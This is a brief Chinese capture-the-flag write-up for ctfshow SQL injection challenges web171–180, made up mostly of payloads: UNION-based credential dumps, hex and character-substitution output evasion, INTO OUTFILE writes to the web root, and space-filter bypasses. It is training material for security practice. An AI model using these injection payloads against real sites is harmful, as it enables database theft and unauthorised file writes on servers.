web171
提示:
我们发现给到的表里面的数据只是到了id=24,我们预计flag的id为25,但尝试过了发现在26
payload
999' or id='26
web172
这题比上一题多了一个
payload
9999'union select id,password from ctfshow_user2 where username = 'flag
web173
同样的题目,这次我们对flag进行处理来逃逸检测
payload
999'union select id,hex(b.username),b.password from ctfshow_user3 as b where b.username='flag
web174
这题把数字给过滤了
我们选择把数字给替换掉
paylaod
0' union select replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password,'1','A'),'2','B'),'3','C'),'4','D'),'5','E'),'6','F'),'7','G'),'8','H'),'9','I'),'0','J'),'a' from ctfshow_user4--+
web175
这里我们尝试写入文件
payload
' union select username, password from ctfshow_user5 into outfile '/var/www/html/flag.txt' %23
web176
这题过滤的比较简单
payload
999' or username = 'flag
web177
这题过滤了空格
payload
替换前
999'union select 1,(password from ctfshow_user where username = 'flag'),'3';%23
替换后
999'union%0bselect'1',(select`password`from`ctfshow_user`where`username`='flag'),'3';%23
web178
上题的payload可行
web179
这里我们用%0c代替%0b代替空格
payload
999'union%0cselect'1',(select`password`from`ctfshow_user`where`username`='flag'),'3';%23
web180
上一个的payload也可用